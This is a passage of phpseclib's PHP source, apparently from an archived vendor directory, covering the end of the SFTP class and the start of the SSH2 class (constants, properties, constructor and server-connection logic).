($this->channel_status[self::CHANNEL] === NET_SSH2_MSG_CHANNEL_CLOSE) { $this->channel_close = true; } $this->packet_type = false; $this->packet_buffer = ''; return false; } $this->packet_buffer .= $temp; $tempLength -= strlen($temp); } $stop = microtime(true); $this->packet_type = ord(Strings::shift($this->packet_buffer)); if ($this->use_request_id) { extract(unpack('Npacket_id', Strings::shift($this->packet_buffer, 4))); // remove the request id $length -= 5; // account for the request id and the packet type } else { $length -= 1; // account for the packet type } $packet = Strings::shift($this->packet_buffer, $length); if (defined('NET_SFTP_LOGGING')) { $packet_type = '<- ' . self::$packet_types[$this->packet_type] . ' (' . round($stop - $start, 4) . 's)'; $this->append_log($packet_type, $packet); } if (isset($request_id) && $this->use_request_id && $packet_id != $request_id) { $this->requestBuffer[$packet_id] = [ 'packet_type' => $this->packet_type, 'packet' => $packet ]; return $this->get_sftp_packet($request_id); } return $packet; } /** * Logs data packets * * Makes sure that only the last 1MB worth of packets will be logged * * @param string $message_number * @param string $message */ private function append_log($message_number, $message) { $this->append_log_helper( NET_SFTP_LOGGING, $message_number, $message, $this->packet_type_log, $this->packet_log, $this->log_size, $this->realtime_log_file, $this->realtime_log_wrap, $this->realtime_log_size ); } /** * Returns a log of the packets that have been sent and received. * * Returns a string if NET_SFTP_LOGGING == self::LOG_COMPLEX, an array if NET_SFTP_LOGGING == self::LOG_SIMPLE and false if !defined('NET_SFTP_LOGGING') * * @return array|string|false */ public function getSFTPLog() { if (!defined('NET_SFTP_LOGGING')) { return false; } switch (NET_SFTP_LOGGING) { case self::LOG_COMPLEX: return $this->format_log($this->packet_log, $this->packet_type_log); break; //case self::LOG_SIMPLE: default: return $this->packet_type_log; } } /** * Returns all errors * * @return array */ public function getSFTPErrors() { return $this->sftp_errors; } /** * Returns the last error * * @return string */ public function getLastSFTPError() { return count($this->sftp_errors) ? $this->sftp_errors[count($this->sftp_errors) - 1] : ''; } /** * Get supported SFTP versions * * @return array */ public function getSupportedVersions() { if (!($this->bitmap & SSH2::MASK_LOGIN)) { return false; } if (!$this->partial_init) { $this->partial_init_sftp_connection(); } $temp = ['version' => $this->defaultVersion]; if (isset($this->extensions['versions'])) { $temp['extensions'] = $this->extensions['versions']; } return $temp; } /** * Get supported SFTP versions * * @return int|false */ public function getNegotiatedVersion() { if (!$this->precheck()) { return false; } return $this->version; } /** * Set preferred version * * If you're preferred version isn't supported then the highest supported * version of SFTP will be utilized. Set to null or false or int(0) to * unset the preferred version * * @param int $version */ public function setPreferredVersion($version) { $this->preferredVersion = $version; } /** * Disconnect * * @param int $reason * @return false */ protected function disconnect_helper($reason) { $this->pwd = false; return parent::disconnect_helper($reason); } /** * Enable Date Preservation * */ public function enableDatePreservation() { $this->preserveTime = true; } /** * Disable Date Preservation * */ public function disableDatePreservation() { $this->preserveTime = false; } } google-api/vendor/phpseclib/phpseclib/phpseclib/Net/SSH2.php000064400000563621147600400120017744 0ustar00 * login('username', 'password')) { * exit('Login Failed'); * } * * echo $ssh->exec('pwd'); * echo $ssh->exec('ls -la'); * ?> * * * * login('username', $key)) { * exit('Login Failed'); * } * * echo $ssh->read('username@username:~$'); * $ssh->write("ls -la\n"); * echo $ssh->read('username@username:~$'); * ?> * * * @author Jim Wigginton * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\Net; use phpseclib3\Common\Functions\Strings; use phpseclib3\Crypt\Blowfish; use phpseclib3\Crypt\ChaCha20; use phpseclib3\Crypt\Common\AsymmetricKey; use phpseclib3\Crypt\Common\PrivateKey; use phpseclib3\Crypt\Common\PublicKey; use phpseclib3\Crypt\Common\SymmetricKey; use phpseclib3\Crypt\DH; use phpseclib3\Crypt\DSA; use phpseclib3\Crypt\EC; use phpseclib3\Crypt\Hash; use phpseclib3\Crypt\Random; use phpseclib3\Crypt\RC4; use phpseclib3\Crypt\Rijndael; use phpseclib3\Crypt\RSA; use phpseclib3\Crypt\TripleDES; // Used to do Diffie-Hellman key exchange and DSA/RSA signature verification. use phpseclib3\Crypt\Twofish; use phpseclib3\Exception\ConnectionClosedException; use phpseclib3\Exception\InsufficientSetupException; use phpseclib3\Exception\NoSupportedAlgorithmsException; use phpseclib3\Exception\UnableToConnectException; use phpseclib3\Exception\UnsupportedAlgorithmException; use phpseclib3\Exception\UnsupportedCurveException; use phpseclib3\Math\BigInteger; use phpseclib3\System\SSH\Agent; /** * Pure-PHP implementation of SSHv2. * * @author Jim Wigginton */ class SSH2 { /**#@+ * Compression Types * */ /** * No compression */ const NET_SSH2_COMPRESSION_NONE = 1; /** * zlib compression */ const NET_SSH2_COMPRESSION_ZLIB = 2; /** * zlib@openssh.com */ const NET_SSH2_COMPRESSION_ZLIB_AT_OPENSSH = 3; /**#@-*/ // Execution Bitmap Masks const MASK_CONSTRUCTOR = 0x00000001; const MASK_CONNECTED = 0x00000002; const MASK_LOGIN_REQ = 0x00000004; const MASK_LOGIN = 0x00000008; const MASK_SHELL = 0x00000010; const MASK_WINDOW_ADJUST = 0x00000020; /* * Channel constants * * RFC4254 refers not to client and server channels but rather to sender and recipient channels. we don't refer * to them in that way because RFC4254 toggles the meaning. the client sends a SSH_MSG_CHANNEL_OPEN message with * a sender channel and the server sends a SSH_MSG_CHANNEL_OPEN_CONFIRMATION in response, with a sender and a * recipient channel. at first glance, you might conclude that SSH_MSG_CHANNEL_OPEN_CONFIRMATION's sender channel * would be the same thing as SSH_MSG_CHANNEL_OPEN's sender channel, but it's not, per this snippet: * The 'recipient channel' is the channel number given in the original * open request, and 'sender channel' is the channel number allocated by * the other side. * * @see \phpseclib3\Net\SSH2::send_channel_packet() * @see \phpseclib3\Net\SSH2::get_channel_packet() */ const CHANNEL_EXEC = 1; // PuTTy uses 0x100 const CHANNEL_SHELL = 2; const CHANNEL_SUBSYSTEM = 3; const CHANNEL_AGENT_FORWARD = 4; const CHANNEL_KEEP_ALIVE = 5; /** * Returns the message numbers * * @see \phpseclib3\Net\SSH2::getLog() */ const LOG_SIMPLE = 1; /** * Returns the message content * * @see \phpseclib3\Net\SSH2::getLog() */ const LOG_COMPLEX = 2; /** * Outputs the content real-time */ const LOG_REALTIME = 3; /** * Dumps the content real-time to a file */ const LOG_REALTIME_FILE = 4; /** * Outputs the message numbers real-time */ const LOG_SIMPLE_REALTIME = 5; /** * Make sure that the log never gets larger than this * * @see \phpseclib3\Net\SSH2::getLog() */ const LOG_MAX_SIZE = 1048576; // 1024 * 1024 /** * Returns when a string matching $expect exactly is found * * @see \phpseclib3\Net\SSH2::read() */ const READ_SIMPLE = 1; /** * Returns when a string matching the regular expression $expect is found * * @see \phpseclib3\Net\SSH2::read() */ const READ_REGEX = 2; /** * Returns whenever a data packet is received. * * Some data packets may only contain a single character so it may be necessary * to call read() multiple times when using this option * * @see \phpseclib3\Net\SSH2::read() */ const READ_NEXT = 3; /** * The SSH identifier * * @var string */ private $identifier; /** * The Socket Object * * @var resource|closed-resource|null */ public $fsock; /** * Execution Bitmap * * The bits that are set represent functions that have been called already. This is used to determine * if a requisite function has been successfully executed. If not, an error should be thrown. * * @var int */ protected $bitmap = 0; /** * Error information * * @see self::getErrors() * @see self::getLastError() * @var array */ private $errors = []; /** * Server Identifier * * @see self::getServerIdentification() * @var string|false */ protected $server_identifier = false; /** * Key Exchange Algorithms * * @see self::getKexAlgorithims() * @var array|false */ private $kex_algorithms = false; /** * Key Exchange Algorithm * * @see self::getMethodsNegotiated() * @var string|false */ private $kex_algorithm = false; /** * Minimum Diffie-Hellman Group Bit Size in RFC 4419 Key Exchange Methods * * @see self::_key_exchange() * @var int */ private $kex_dh_group_size_min = 1536; /** * Preferred Diffie-Hellman Group Bit Size in RFC 4419 Key Exchange Methods * * @see self::_key_exchange() * @var int */ private $kex_dh_group_size_preferred = 2048; /** * Maximum Diffie-Hellman Group Bit Size in RFC 4419 Key Exchange Methods * * @see self::_key_exchange() * @var int */ private $kex_dh_group_size_max = 4096; /** * Server Host Key Algorithms * * @see self::getServerHostKeyAlgorithms() * @var array|false */ private $server_host_key_algorithms = false; /** * Supported Private Key Algorithms * * In theory this should be the same as the Server Host Key Algorithms but, in practice, * some servers (eg. Azure) will support rsa-sha2-512 as a server host key algorithm but * not a private key algorithm * * @see self::privatekey_login() * @var array|false */ private $supported_private_key_algorithms = false; /** * Encryption Algorithms: Client to Server * * @see self::getEncryptionAlgorithmsClient2Server() * @var array|false */ private $encryption_algorithms_client_to_server = false; /** * Encryption Algorithms: Server to Client * * @see self::getEncryptionAlgorithmsServer2Client() * @var array|false */ private $encryption_algorithms_server_to_client = false; /** * MAC Algorithms: Client to Server * * @see self::getMACAlgorithmsClient2Server() * @var array|false */ private $mac_algorithms_client_to_server = false; /** * MAC Algorithms: Server to Client * * @see self::getMACAlgorithmsServer2Client() * @var array|false */ private $mac_algorithms_server_to_client = false; /** * Compression Algorithms: Client to Server * * @see self::getCompressionAlgorithmsClient2Server() * @var array|false */ private $compression_algorithms_client_to_server = false; /** * Compression Algorithms: Server to Client * * @see self::getCompressionAlgorithmsServer2Client() * @var array|false */ private $compression_algorithms_server_to_client = false; /** * Languages: Server to Client * * @see self::getLanguagesServer2Client() * @var array|false */ private $languages_server_to_client = false; /** * Languages: Client to Server * * @see self::getLanguagesClient2Server() * @var array|false */ private $languages_client_to_server = false; /** * Preferred Algorithms * * @see self::setPreferredAlgorithms() * @var array */ private $preferred = []; /** * Block Size for Server to Client Encryption * * "Note that the length of the concatenation of 'packet_length', * 'padding_length', 'payload', and 'random padding' MUST be a multiple * of the cipher block size or 8, whichever is larger. This constraint * MUST be enforced, even when using stream ciphers." * * -- http://tools.ietf.org/html/rfc4253#section-6 * * @see self::__construct() * @see self::_send_binary_packet() * @var int */ private $encrypt_block_size = 8; /** * Block Size for Client to Server Encryption * * @see self::__construct() * @see self::_get_binary_packet() * @var int */ private $decrypt_block_size = 8; /** * Server to Client Encryption Object * * @see self::_get_binary_packet() * @var SymmetricKey|false */ private $decrypt = false; /** * Decryption Algorithm Name * * @var string|null */ private $decryptName; /** * Decryption Invocation Counter * * Used by GCM * * @var string|null */ private $decryptInvocationCounter; /** * Fixed Part of Nonce * * Used by GCM * * @var string|null */ private $decryptFixedPart; /** * Server to Client Length Encryption Object * * @see self::_get_binary_packet() * @var object */ private $lengthDecrypt = false; /** * Client to Server Encryption Object * * @see self::_send_binary_packet() * @var SymmetricKey|false */ private $encrypt = false; /** * Encryption Algorithm Name * * @var string|null */ private $encryptName; /** * Encryption Invocation Counter * * Used by GCM * * @var string|null */ private $encryptInvocationCounter; /** * Fixed Part of Nonce * * Used by GCM * * @var string|null */ private $encryptFixedPart; /** * Client to Server Length Encryption Object * * @see self::_send_binary_packet() * @var object */ private $lengthEncrypt = false; /** * Client to Server HMAC Object * * @see self::_send_binary_packet() * @var object */ private $hmac_create = false; /** * Client to Server HMAC Name * * @var string|false */ private $hmac_create_name; /** * Client to Server ETM * * @var int|false */ private $hmac_create_etm; /** * Server to Client HMAC Object * * @see self::_get_binary_packet() * @var object */ private $hmac_check = false; /** * Server to Client HMAC Name * * @var string|false */ private $hmac_check_name; /** * Server to Client ETM * * @var int|false */ private $hmac_check_etm; /** * Size of server to client HMAC * * We need to know how big the HMAC will be for the server to client direction so that we know how many bytes to read. * For the client to server side, the HMAC object will make the HMAC as long as it needs to be. All we need to do is * append it. * * @see self::_get_binary_packet() * @var int */ private $hmac_size = false; /** * Server Public Host Key * * @see self::getServerPublicHostKey() * @var string */ private $server_public_host_key; /** * Session identifier * * "The exchange hash H from the first key exchange is additionally * used as the session identifier, which is a unique identifier for * this connection." * * -- http://tools.ietf.org/html/rfc4253#section-7.2 * * @see self::_key_exchange() * @var string */ private $session_id = false; /** * Exchange hash * * The current exchange hash * * @see self::_key_exchange() * @var string */ private $exchange_hash = false; /** * Message Numbers * * @see self::__construct() * @var array * @access private */ private static $message_numbers = []; /** * Disconnection Message 'reason codes' defined in RFC4253 * * @see self::__construct() * @var array * @access private */ private static $disconnect_reasons = []; /** * SSH_MSG_CHANNEL_OPEN_FAILURE 'reason codes', defined in RFC4254 * * @see self::__construct() * @var array * @access private */ private static $channel_open_failure_reasons = []; /** * Terminal Modes * * @link http://tools.ietf.org/html/rfc4254#section-8 * @see self::__construct() * @var array * @access private */ private static $terminal_modes = []; /** * SSH_MSG_CHANNEL_EXTENDED_DATA's data_type_codes * * @link http://tools.ietf.org/html/rfc4254#section-5.2 * @see self::__construct() * @var array * @access private */ private static $channel_extended_data_type_codes = []; /** * Send Sequence Number * * See 'Section 6.4. Data Integrity' of rfc4253 for more info. * * @see self::_send_binary_packet() * @var int */ private $send_seq_no = 0; /** * Get Sequence Number * * See 'Section 6.4. Data Integrity' of rfc4253 for more info. * * @see self::_get_binary_packet() * @var int */ private $get_seq_no = 0; /** * Server Channels * * Maps client channels to server channels * * @see self::get_channel_packet() * @see self::exec() * @var array */ protected $server_channels = []; /** * Channel Buffers * * If a client requests a packet from one channel but receives two packets from another those packets should * be placed in a buffer * * @see self::get_channel_packet() * @see self::exec() * @var array */ private $channel_buffers = []; /** * Channel Status * * Contains the type of the last sent message * * @see self::get_channel_packet() * @var array */ protected $channel_status = []; /** * The identifier of the interactive channel which was opened most recently * * @see self::getInteractiveChannelId() * @var int */ private $channel_id_last_interactive = 0; /** * Packet Size * * Maximum packet size indexed by channel * * @see self::send_channel_packet() * @var array */ private $packet_size_client_to_server = []; /** * Message Number Log * * @see self::getLog() * @var array */ private $message_number_log = []; /** * Message Log * * @see self::getLog() * @var array */ private $message_log = []; /** * The Window Size * * Bytes the other party can send before it must wait for the window to be adjusted (0x7FFFFFFF = 2GB) * * @var int * @see self::send_channel_packet() * @see self::exec() */ protected $window_size = 0x7FFFFFFF; /** * What we resize the window to * * When PuTTY resizes the window it doesn't add an additional 0x7FFFFFFF bytes - it adds 0x40000000 bytes. * Some SFTP clients (GoAnywhere) don't support adding 0x7FFFFFFF to the window size after the fact so * we'll just do what PuTTY does * * @var int * @see self::_send_channel_packet() * @see self::exec() */ private $window_resize = 0x40000000; /** * Window size, server to client * * Window size indexed by channel * * @see self::send_channel_packet() * @var array */ protected $window_size_server_to_client = []; /** * Window size, client to server * * Window size indexed by channel * * @see self::get_channel_packet() * @var array */ private $window_size_client_to_server = []; /** * Server signature * * Verified against $this->session_id * * @see self::getServerPublicHostKey() * @var string */ private $signature = ''; /** * Server signature format * * ssh-rsa or ssh-dss. * * @see self::getServerPublicHostKey() * @var string */ private $signature_format = ''; /** * Interactive Buffer * * @see self::read() * @var string */ private $interactiveBuffer = ''; /** * Current log size * * Should never exceed self::LOG_MAX_SIZE * * @see self::_send_binary_packet() * @see self::_get_binary_packet() * @var int */ private $log_size; /** * Timeout * * @see self::setTimeout() */ protected $timeout; /** * Current Timeout * * @see self::get_channel_packet() */ protected $curTimeout; /** * Keep Alive Interval * * @see self::setKeepAlive() */ private $keepAlive; /** * Real-time log file pointer * * @see self::_append_log() * @var resource|closed-resource */ private $realtime_log_file; /** * Real-time log file size * * @see self::_append_log() * @var int */ private $realtime_log_size; /** * Has the signature been validated? * * @see self::getServerPublicHostKey() * @var bool */ private $signature_validated = false; /** * Real-time log file wrap boolean * * @see self::_append_log() * @var bool */ private $realtime_log_wrap; /** * Flag to suppress stderr from output * * @see self::enableQuietMode() */ private $quiet_mode = false; /** * Time of first network activity * * @var float */ private $last_packet; /** * Exit status returned from ssh if any * * @var int */ private $exit_status; /** * Flag to request a PTY when using exec() * * @var bool * @see self::enablePTY() */ private $request_pty = false; /** * Contents of stdError * * @var string */ private $stdErrorLog; /** * The Last Interactive Response * * @see self::_keyboard_interactive_process() * @var string */ private $last_interactive_response = ''; /** * Keyboard Interactive Request / Responses * * @see self::_keyboard_interactive_process() * @var array */ private $keyboard_requests_responses = []; /** * Banner Message * * Quoting from the RFC, "in some jurisdictions, sending a warning message before * authentication may be relevant for getting legal protection." * * @see self::_filter() * @see self::getBannerMessage() * @var string */ private $banner_message = ''; /** * Did read() timeout or return normally? * * @see self::isTimeout() * @var bool */ private $is_timeout = false; /** * Log Boundary * * @see self::_format_log() * @var string */ private $log_boundary = ':'; /** * Log Long Width * * @see self::_format_log() * @var int */ private $log_long_width = 65; /** * Log Short Width * * @see self::_format_log() * @var int */ private $log_short_width = 16; /** * Hostname * * @see self::__construct() * @see self::_connect() * @var string */ private $host; /** * Port Number * * @see self::__construct() * @see self::_connect() * @var int */ private $port; /** * Number of columns for terminal window size * * @see self::getWindowColumns() * @see self::setWindowColumns() * @see self::setWindowSize() * @var int */ private $windowColumns = 80; /** * Number of columns for terminal window size * * @see self::getWindowRows() * @see self::setWindowRows() * @see self::setWindowSize() * @var int */ private $windowRows = 24; /** * Crypto Engine * * @see self::setCryptoEngine() * @see self::_key_exchange() * @var int */ private static $crypto_engine = false; /** * A System_SSH_Agent for use in the SSH2 Agent Forwarding scenario * * @var Agent */ private $agent; /** * Connection storage to replicates ssh2 extension functionality: * {@link http://php.net/manual/en/wrappers.ssh2.php#refsect1-wrappers.ssh2-examples} * * @var array> */ private static $connections; /** * Send the identification string first? * * @var bool */ private $send_id_string_first = true; /** * Send the key exchange initiation packet first? * * @var bool */ private $send_kex_first = true; /** * Some versions of OpenSSH incorrectly calculate the key size * * @var bool */ private $bad_key_size_fix = false; /** * Should we try to re-connect to re-establish keys? * * @var bool */ private $retry_connect = false; /** * Binary Packet Buffer * * @var string|false */ private $binary_packet_buffer = false; /** * Preferred Signature Format * * @var string|false */ protected $preferred_signature_format = false; /** * Authentication Credentials * * @var array */ protected $auth = []; /** * Terminal * * @var string */ private $term = 'vt100'; /** * The authentication methods that may productively continue authentication. * * @see https://tools.ietf.org/html/rfc4252#section-5.1 * @var array|null */ private $auth_methods_to_continue = null; /** * Compression method * * @var int */ private $compress = self::NET_SSH2_COMPRESSION_NONE; /** * Decompression method * * @var int */ private $decompress = self::NET_SSH2_COMPRESSION_NONE; /** * Compression context * * @var resource|false|null */ private $compress_context; /** * Decompression context * * @var resource|object */ private $decompress_context; /** * Regenerate Compression Context * * @var bool */ private $regenerate_compression_context = false; /** * Regenerate Decompression Context * * @var bool */ private $regenerate_decompression_context = false; /** * Smart multi-factor authentication flag * * @var bool */ private $smartMFA = true; /** * How many channels are currently opened * * @var int */ private $channelCount = 0; /** * Does the server support multiple channels? If not then error out * when multiple channels are attempted to be opened * * @var bool */ private $errorOnMultipleChannels; /** * Terrapin Countermeasure * * "During initial KEX, terminate the connection if any unexpected or out-of-sequence packet is received" * -- https://github.com/openssh/openssh-portable/commit/1edb00c58f8a6875fad6a497aa2bacf37f9e6cd5 * * @var int */ private $extra_packets; /** * Default Constructor. * * $host can either be a string, representing the host, or a stream resource. * * @param mixed $host * @param int $port * @param int $timeout * @see self::login() */ public function __construct($host, $port = 22, $timeout = 10) { if (empty(self::$message_numbers)) { self::$message_numbers = [ 1 => 'NET_SSH2_MSG_DISCONNECT', 2 => 'NET_SSH2_MSG_IGNORE', 3 => 'NET_SSH2_MSG_UNIMPLEMENTED', 4 => 'NET_SSH2_MSG_DEBUG', 5 => 'NET_SSH2_MSG_SERVICE_REQUEST', 6 => 'NET_SSH2_MSG_SERVICE_ACCEPT', 7 => 'NET_SSH2_MSG_EXT_INFO', // RFC 8308 20 => 'NET_SSH2_MSG_KEXINIT', 21 => 'NET_SSH2_MSG_NEWKEYS', 30 => 'NET_SSH2_MSG_KEXDH_INIT', 31 => 'NET_SSH2_MSG_KEXDH_REPLY', 50 => 'NET_SSH2_MSG_USERAUTH_REQUEST', 51 => 'NET_SSH2_MSG_USERAUTH_FAILURE', 52 => 'NET_SSH2_MSG_USERAUTH_SUCCESS', 53 => 'NET_SSH2_MSG_USERAUTH_BANNER', 80 => 'NET_SSH2_MSG_GLOBAL_REQUEST', 81 => 'NET_SSH2_MSG_REQUEST_SUCCESS', 82 => 'NET_SSH2_MSG_REQUEST_FAILURE', 90 => 'NET_SSH2_MSG_CHANNEL_OPEN', 91 => 'NET_SSH2_MSG_CHANNEL_OPEN_CONFIRMATION', 92 => 'NET_SSH2_MSG_CHANNEL_OPEN_FAILURE', 93 => 'NET_SSH2_MSG_CHANNEL_WINDOW_ADJUST', 94 => 'NET_SSH2_MSG_CHANNEL_DATA', 95 => 'NET_SSH2_MSG_CHANNEL_EXTENDED_DATA', 96 => 'NET_SSH2_MSG_CHANNEL_EOF', 97 => 'NET_SSH2_MSG_CHANNEL_CLOSE', 98 => 'NET_SSH2_MSG_CHANNEL_REQUEST', 99 => 'NET_SSH2_MSG_CHANNEL_SUCCESS', 100 => 'NET_SSH2_MSG_CHANNEL_FAILURE' ]; self::$disconnect_reasons = [ 1 => 'NET_SSH2_DISCONNECT_HOST_NOT_ALLOWED_TO_CONNECT', 2 => 'NET_SSH2_DISCONNECT_PROTOCOL_ERROR', 3 => 'NET_SSH2_DISCONNECT_KEY_EXCHANGE_FAILED', 4 => 'NET_SSH2_DISCONNECT_RESERVED', 5 => 'NET_SSH2_DISCONNECT_MAC_ERROR', 6 => 'NET_SSH2_DISCONNECT_COMPRESSION_ERROR', 7 => 'NET_SSH2_DISCONNECT_SERVICE_NOT_AVAILABLE', 8 => 'NET_SSH2_DISCONNECT_PROTOCOL_VERSION_NOT_SUPPORTED', 9 => 'NET_SSH2_DISCONNECT_HOST_KEY_NOT_VERIFIABLE', 10 => 'NET_SSH2_DISCONNECT_CONNECTION_LOST', 11 => 'NET_SSH2_DISCONNECT_BY_APPLICATION', 12 => 'NET_SSH2_DISCONNECT_TOO_MANY_CONNECTIONS', 13 => 'NET_SSH2_DISCONNECT_AUTH_CANCELLED_BY_USER', 14 => 'NET_SSH2_DISCONNECT_NO_MORE_AUTH_METHODS_AVAILABLE', 15 => 'NET_SSH2_DISCONNECT_ILLEGAL_USER_NAME' ]; self::$channel_open_failure_reasons = [ 1 => 'NET_SSH2_OPEN_ADMINISTRATIVELY_PROHIBITED' ]; self::$terminal_modes = [ 0 => 'NET_SSH2_TTY_OP_END' ]; self::$channel_extended_data_type_codes = [ 1 => 'NET_SSH2_EXTENDED_DATA_STDERR' ]; self::define_array( self::$message_numbers, self::$disconnect_reasons, self::$channel_open_failure_reasons, self::$terminal_modes, self::$channel_extended_data_type_codes, [60 => 'NET_SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ'], [60 => 'NET_SSH2_MSG_USERAUTH_PK_OK'], [60 => 'NET_SSH2_MSG_USERAUTH_INFO_REQUEST', 61 => 'NET_SSH2_MSG_USERAUTH_INFO_RESPONSE'], // RFC 4419 - diffie-hellman-group-exchange-sha{1,256} [30 => 'NET_SSH2_MSG_KEXDH_GEX_REQUEST_OLD', 31 => 'NET_SSH2_MSG_KEXDH_GEX_GROUP', 32 => 'NET_SSH2_MSG_KEXDH_GEX_INIT', 33 => 'NET_SSH2_MSG_KEXDH_GEX_REPLY', 34 => 'NET_SSH2_MSG_KEXDH_GEX_REQUEST'], // RFC 5656 - Elliptic Curves (for curve25519-sha256@libssh.org) [30 => 'NET_SSH2_MSG_KEX_ECDH_INIT', 31 => 'NET_SSH2_MSG_KEX_ECDH_REPLY'] ); } /** * Typehint is required due to a bug in Psalm: https://github.com/vimeo/psalm/issues/7508 * @var \WeakReference|SSH2 */ self::$connections[$this->getResourceId()] = class_exists('WeakReference') ? \WeakReference::create($this) : $this; if (is_resource($host)) { $this->fsock = $host; return; } if (Strings::is_stringable($host)) { $this->host = $host; $this->port = $port; $this->timeout = $timeout; } } /** * Set Crypto Engine Mode * * Possible $engine values: * OpenSSL, mcrypt, Eval, PHP * * @param int $engine */ public static function setCryptoEngine($engine) { self::$crypto_engine = $engine; } /** * Send Identification String First * * https://tools.ietf.org/html/rfc4253#section-4.2 says "when the connection has been established, * both sides MUST send an identification string". It does not say which side sends it first. In * theory it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendIdentificationStringFirst() { $this->send_id_string_first = true; } /** * Send Identification String Last * * https://tools.ietf.org/html/rfc4253#section-4.2 says "when the connection has been established, * both sides MUST send an identification string". It does not say which side sends it first. In * theory it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendIdentificationStringLast() { $this->send_id_string_first = false; } /** * Send SSH_MSG_KEXINIT First * * https://tools.ietf.org/html/rfc4253#section-7.1 says "key exchange begins by each sending * sending the [SSH_MSG_KEXINIT] packet". It does not say which side sends it first. In theory * it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendKEXINITFirst() { $this->send_kex_first = true; } /** * Send SSH_MSG_KEXINIT Last * * https://tools.ietf.org/html/rfc4253#section-7.1 says "key exchange begins by each sending * sending the [SSH_MSG_KEXINIT] packet". It does not say which side sends it first. In theory * it shouldn't matter but it is a fact of life that some SSH servers are simply buggy * */ public function sendKEXINITLast() { $this->send_kex_first = false; } /** * stream_select wrapper * * Quoting https://stackoverflow.com/a/14262151/569976, * "The general approach to `EINTR` is to simply handle the error and retry the operation again" * * This wrapper does that loop */ private static function stream_select(&$read, &$write, &$except, $seconds, $microseconds = null) { $remaining = $seconds + $microseconds / 1000000; $start = microtime(true); while (true) { $result = @stream_select($read, $write, $except, $seconds, $microseconds); if ($result !== false) { return $result; } $elapsed = microtime(true) - $start; $seconds = (int) ($remaining - floor($elapsed)); $microseconds = (int) (1000000 * ($remaining - $seconds)); if ($elapsed >= $remaining) { return false; } } } /** * Connect to an SSHv2 server * * @throws \UnexpectedValueException on receipt of unexpected packets * @throws \RuntimeException on other errors */ private function connect() { if ($this->bitmap & self::MASK_CONSTRUCTOR) { return; } $this->bitmap |= self::MASK_CONSTRUCTOR; $this->curTimeout = $this->timeout; $this->last_packet = microtime(true); if (!is_resource($this->fsock)) { $start = microtime(true); // with stream_select a timeout of 0 means that no timeout takes place; // with fsockopen a timeout of 0 means that you instantly timeout // to resolve this incompatibility a timeout of 100,000 will be used for fsockopen if timeout is 0 $this->fsock = @fsockopen($this->host, $this->port, $errno, $errstr, $this->curTimeout == 0 ? 100000 : $this->curTimeout); if (!$this->fsock) { $host = $this->host . ':' . $this->port; throw new UnableToConnectException(rtrim("Cannot connect to $host. Error $errno. $errstr")); } $elapsed = microtime(true) - $start; if ($this->curTimeout) { $this->curTimeout -= $elapsed; if ($this->curTimeout < 0) { throw new \RuntimeException('Connection timed out whilst attempting to open socket connection'); } } } $this->identifier = $this->generate_identifier(); if ($this->send_id_string_first) { fputs($this->fsock, $this->identifier . "\r\n"); } /* According to the SSH2 specs, "The server MAY send other lines of data before sending the version string. Each line SHOULD be terminated by a Carriage Return and Line Feed. Such lines MUST NOT begin with "SSH-", and SHOULD be encoded in ISO-10646 UTF-8 [RFC3629] (language is not specified). Clients MUST be able to process such lines." */ $data = ''; while (!feof($this->fsock) && !preg_match('#(.*)^(SSH-(\d\.\d+).*)#ms', $data, $matches)) { $line = ''; while (true) { if ($this->curTimeout) { if ($this->curTimeout < 0) { throw new \RuntimeException('Connection timed out whilst receiving server identification string'); } $read = [$this->fsock]; $write = $except = null; $start = microtime(true); $sec = (int) floor($this->curTimeout); $usec = (int) (1000000 * ($this->curTimeout - $sec)); if (static::stream_select($read, $write, $except, $sec, $usec) === false) { throw new \RuntimeException('Connection timed out whilst receiving server identification string'); } $elapsed = microtime(true) - $start; $this->curTimeout -= $elapsed; } $temp = stream_get_line($this->fsock, 255, "\n"); if ($temp === false) { throw new \RuntimeException('Error reading from socket'); } if (strlen($temp) == 255) { continue; } $line .= "$temp\n"; // quoting RFC4253, "Implementers who wish to maintain // compatibility with older, undocumented versions of this protocol may // want to process the identification string without expecting the // presence of the carriage return character for reasons described in // Section 5 of this document." //if (substr($line, -2) == "\r\n") { // break; //} break; } $data .= $line; } if (feof($this->fsock)) { $this->bitmap = 0; throw new ConnectionClosedException('Connection closed by server'); } $extra = $matches[1]; if (defined('NET_SSH2_LOGGING')) { $this->append_log('<-', $matches[0]); $this->append_log('->', $this->identifier . "\r\n"); } $this->server_identifier = trim($temp, "\r\n"); if (strlen($extra)) { $this->errors[] = $data; } if (version_compare($matches[3], '1.99', '<')) { $this->bitmap = 0; throw new UnableToConnectException("Cannot connect to SSH $matches[3] servers"); } // Ubuntu's OpenSSH from 5.8 to 6.9 didn't work with multiple channels. see // https://bugs.launchpad.net/ubuntu/+source/openssh/+bug/1334916 for more info. // https://lists.ubuntu.com/archives/oneiric-changes/2011-July/005772.html discusses // when consolekit was incorporated. // https://marc.info/?l=openssh-unix-dev&m=163409903417589&w=2 discusses some of the // issues with how Ubuntu incorporated consolekit $pattern = '#^SSH-2\.0-OpenSSH_([\d.]+)[^ ]* Ubuntu-.*$#'; $match = preg_match($pattern, $this->server_identifier, $matches); $match = $match && version_compare('5.8', $matches[1], '<='); $match = $match && version_compare('6.9', $matches[1], '>='); $this->errorOnMultipleChannels = $match; if (!$this->send_id_string_first) { fputs($this->fsock, $this->identifier . "\r\n"); } if (!$this->send_kex_first) { $response = $this->get_binary_packet(); if (is_bool($response) || !strlen($response) || ord($response[0]) != NET_SSH2_MSG_KEXINIT) { $this->bitmap = 0; throw new \UnexpectedValueException('Expected SSH_MSG_KEXINIT'); } $this->key_exchange($response); } if ($this->send_kex_first) { $this->key_exchange(); } $this->bitmap |= self::MASK_CONNECTED; return true; } /** * Generates the SSH identifier * * You should overwrite this method in your own class if you want to use another identifier * * @return string */ private function generate_identifier() { $identifier = 'SSH-2.0-phpseclib_3.0'; $ext = []; if (extension_loaded('sodium')) { $ext[] = 'libsodium'; } if (extension_loaded('openssl')) { $ext[] = 'openssl'; } elseif (extension_loaded('mcrypt')) { $ext[] = 'mcrypt'; } if (extension_loaded('gmp')) { $ext[] = 'gmp'; } elseif (extension_loaded('bcmath')) { $ext[] = 'bcmath'; } if (!empty($ext)) { $identifier .= ' (' . 